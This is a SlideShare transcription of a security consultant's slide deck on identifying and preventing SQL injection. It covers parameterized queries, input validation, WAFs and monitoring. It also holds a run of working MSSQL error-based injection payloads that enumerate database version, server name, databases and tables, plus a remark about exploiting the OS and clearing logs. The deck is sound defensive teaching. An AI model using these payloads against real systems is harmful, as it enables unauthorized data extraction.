SlideShare a Scribd company logo

How to Identify and Prevent SQL Injection

Janith Malinga
Janith Malinga

How to detect and prevent SQL Injection

Technology
1 of 47
Download to read offline
How to Identify and Prevent SQL Injection
#Whoami Janith Malinga Security Consultant @egscyber Web Pentester for 4 years Enthusiastic traveler Community teacher over for 6 years Twitter : @janithSmalinga linkedIn : https://www.linkedin.com/in/malingajanith/ Github : https://github.com/janithmalinga Phone : 0769803462
Why web applications need security • Behind most applications lies sensitive data • Easy to access • Anybody can access from anywhere • Hard to trace back • Lot of tools available to hack a web site (sql map, BEEF)
Web Application Vulnerabilities OWASP Top 10 Application Security Risks 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring
SQL Injection (SQLi)
What is SQLi SQLi is a vulnerability that results in letting an attacker influence SQL queries that an application passes to the backend of a database
Well known SQLi Attacks • Lenovo (2019) 1+ million users compromised • Texas.gov and Florida.gov (2018) state databases of contractors and employees leaked. • Shamshabad engineering college incident (2018) Students hack the system and changed their results • Mossack Fonseca (Panama Papers) (2016) The famous panama paper incident by wikileaks.
Well known SQLi Attacks SQLi Malwares • Asprox • Lizamoon
Understand how web applications work Client Computer Application Server Database Server
Understand how web applications work Client Computer Application Server Database Server Request /home.php Response /home.php
Understand how web applications work Student search ID: Search https://www.abcd.com/student
Understand how web applications work Student search 123ID: Search https://www.abcd.com/student?id=123
Understand how web applications work Student search 123ID: Search https://www.abcd.com/student ID 123 Name Bob Age 18 Class Maths
Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=123 Response /student.php id=123&name=Bob&a ge=18&class=Maths What’s happening under the hood??? Select * from students where id=123 123 Bob 18 Maths
Understanding SQLi Recall: what is SQLi? SQLi is a vulnerability that results when you gives an attacker the ability to influence the SQL queries that an application passes to a backend database.
Understanding SQLi Now let’s manipulate the input so that the database will be confused ☺
Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ The user input is only ‘ character
Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=‘ Response /student.php Error: What the heck are you searching??? What’s happening under the hood??? Select * from students where id=‘ Error: What the heck are you searching???
Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ Error: What the heck are you searching???
MySQL error
MSSQL error
Understanding SQLi DEMO
What SQLi can do • Extract data • Add or modify data • Perform DOS attack • Bypass authentication • Executing remote commands
Sample SQL Injection Attack
Web login form First we sent the input ‘ character Member login Username: Password: Login
Output – page is vulnerable to sql injection
Payload: a’ and 1=0/@@version;-- Find database version
Payload: a' and 1=0/(select @@servername);-- Find server name
Payload: a' and 1=0/(select db_name());-- Find database name
Payload: a' and 1=0/(select top 1 name from master..sysdatabases);-- Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases));-- Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 2 name from master..sysdatabases));-- Find all databases
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 1 name from sysobjects where xtype = 'U'));-- Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 2 name from sysobjects where xtype = 'U'));-- Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 3 name from sysobjects where xtype = 'U'));-- Find tables
Next steps • Getting all the data • Manipulating the data • Finally exploit the OS and gain access to the server and clear the logs. ☺ ☺ ☺
How to Prevent SQL Injection
Prevent SQL Injection 1. Code level prevention 2. Platform level prevention
Prevent SQL Injection Code level prevention - Use parameterized queries Bad practice username = request(“username”) password = request(“password”) sql = “SELECT * FROM users WHERE username=‘ ” + username + “ ’ AND password=‘ “ + password + “ ‘ “; result = Db.Execute(sql) If(result){/*Login success*/}
Prevent SQL Injection Good practice : Use parameterized queries username = request(“username”) password = request(“password”) string sql = “SELECT * FROM users WHERE username=? AND password=?”; preparedstatement cmd = con.preparedstatement(sql); cmd.setstring(1, username); cmd.setstring(2, password); result = cmd.executeQuery(); If(result){/*Login success*/}
Prevent SQL Injection Code level prevention - Validating input • Whitelisting • Blacklisting Data type, data size, data range, content
Prevent SQL Injection Code level prevention - Encoding output Encoding to the database sql = sql.replace(“’”, “’’”);
Prevent SQL Injection Platform level prevention - Web application firewall (WAF)
Prevent SQL Injection Platform level prevention - IPS
Prevent SQL Injection Platform level prevention – Log collection and Monitoring
Q&A !!!
How to Identify and Prevent SQL Injection

Recommended

How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defenseJose Mato
 
SQL Injections and Behind...
SQL Injections and Behind...SQL Injections and Behind...
SQL Injections and Behind...arjunguptam
 
C days2015
C days2015C days2015
C days2015Nuno Loureiro
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect XssFerruh Mavituna
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareMichael Hendrickx
 

Recommended

How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defenseJose Mato
 
SQL Injections and Behind...
SQL Injections and Behind...SQL Injections and Behind...
SQL Injections and Behind...arjunguptam
 
C days2015
C days2015C days2015
C days2015Nuno Loureiro
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect XssFerruh Mavituna
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareMichael Hendrickx
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
Web Security: SQL Injection
Web Security: SQL InjectionWeb Security: SQL Injection
Web Security: SQL InjectionVortana Say
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application securityJames Crowley
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaserNotSoSecure Global Services
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 
SQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop ItSQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop ItGrant Fritchey
 
SQL Injection in JAVA
SQL Injection in JAVASQL Injection in JAVA
SQL Injection in JAVAHossein Yavari
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web SecuritySharePointRadi
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachJeff Prom
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenSqreen
 

More Related Content

What's hot

SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
Web Security: SQL Injection
Web Security: SQL InjectionWeb Security: SQL Injection
Web Security: SQL InjectionVortana Say
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application securityJames Crowley
 

What's hot (11)

SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
Sql injection
Sql injectionSql injection
Sql injection
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
 
Web Security: SQL Injection
Web Security: SQL InjectionWeb Security: SQL Injection
Web Security: SQL Injection
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
 

Similar to How to Identify and Prevent SQL Injection

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 
SQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop ItSQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop ItGrant Fritchey
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachJeff Prom
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenSqreen
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampFelipe Prado
 
SQL Injection Attacks - Is Your Data Secure? GroupBy Conference
SQL Injection Attacks - Is Your Data Secure? GroupBy ConferenceSQL Injection Attacks - Is Your Data Secure? GroupBy Conference
SQL Injection Attacks - Is Your Data Secure? GroupBy ConferenceBert Wagner
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive MeasuresShubham Takode
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen? Claranet UK
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptCNSHacking
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptLokeshK66
 

Similar to How to Identify and Prevent SQL Injection (20)

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection Exploited
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaser
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
 
SQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop ItSQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop It
 
SQL Injection in JAVA
SQL Injection in JAVASQL Injection in JAVA
SQL Injection in JAVA
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington Beach
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
 
Sql security
Sql securitySql security
Sql security
 
SQL Injection Attacks - Is Your Data Secure? GroupBy Conference
SQL Injection Attacks - Is Your Data Secure? GroupBy ConferenceSQL Injection Attacks - Is Your Data Secure? GroupBy Conference
SQL Injection Attacks - Is Your Data Secure? GroupBy Conference
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen?
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 

Recently uploaded

Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 

Recently uploaded (20)

Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 

How to Identify and Prevent SQL Injection

  • 1. How to Identify and Prevent SQL Injection
  • 2. #Whoami Janith Malinga Security Consultant @egscyber Web Pentester for 4 years Enthusiastic traveler Community teacher over for 6 years Twitter : @janithSmalinga linkedIn : https://www.linkedin.com/in/malingajanith/ Github : https://github.com/janithmalinga Phone : 0769803462
  • 3. Why web applications need security • Behind most applications lies sensitive data • Easy to access • Anybody can access from anywhere • Hard to trace back • Lot of tools available to hack a web site (sql map, BEEF)
  • 4. Web Application Vulnerabilities OWASP Top 10 Application Security Risks 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring
  • 6. What is SQLi SQLi is a vulnerability that results in letting an attacker influence SQL queries that an application passes to the backend of a database
  • 7. Well known SQLi Attacks • Lenovo (2019) 1+ million users compromised • Texas.gov and Florida.gov (2018) state databases of contractors and employees leaked. • Shamshabad engineering college incident (2018) Students hack the system and changed their results • Mossack Fonseca (Panama Papers) (2016) The famous panama paper incident by wikileaks.
  • 8. Well known SQLi Attacks SQLi Malwares • Asprox • Lizamoon
  • 9. Understand how web applications work Client Computer Application Server Database Server
  • 10. Understand how web applications work Client Computer Application Server Database Server Request /home.php Response /home.php
  • 11. Understand how web applications work Student search ID: Search https://www.abcd.com/student
  • 12. Understand how web applications work Student search 123ID: Search https://www.abcd.com/student?id=123
  • 13. Understand how web applications work Student search 123ID: Search https://www.abcd.com/student ID 123 Name Bob Age 18 Class Maths
  • 14. Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=123 Response /student.php id=123&name=Bob&a ge=18&class=Maths What’s happening under the hood??? Select * from students where id=123 123 Bob 18 Maths
  • 15. Understanding SQLi Recall: what is SQLi? SQLi is a vulnerability that results when you gives an attacker the ability to influence the SQL queries that an application passes to a backend database.
  • 16. Understanding SQLi Now let’s manipulate the input so that the database will be confused ☺
  • 17. Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ The user input is only ‘ character
  • 18. Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=‘ Response /student.php Error: What the heck are you searching??? What’s happening under the hood??? Select * from students where id=‘ Error: What the heck are you searching???
  • 19. Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ Error: What the heck are you searching???
  • 23. What SQLi can do • Extract data • Add or modify data • Perform DOS attack • Bypass authentication • Executing remote commands
  • 25. Web login form First we sent the input ‘ character Member login Username: Password: Login
  • 26. Output – page is vulnerable to sql injection
  • 27. Payload: a’ and 1=0/@@version;-- Find database version
  • 28. Payload: a' and 1=0/(select @@servername);-- Find server name
  • 29. Payload: a' and 1=0/(select db_name());-- Find database name
  • 30. Payload: a' and 1=0/(select top 1 name from master..sysdatabases);-- Find all databases
  • 31. Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases));-- Find all databases
  • 32. Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 2 name from master..sysdatabases));-- Find all databases
  • 33. Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 1 name from sysobjects where xtype = 'U'));-- Find tables
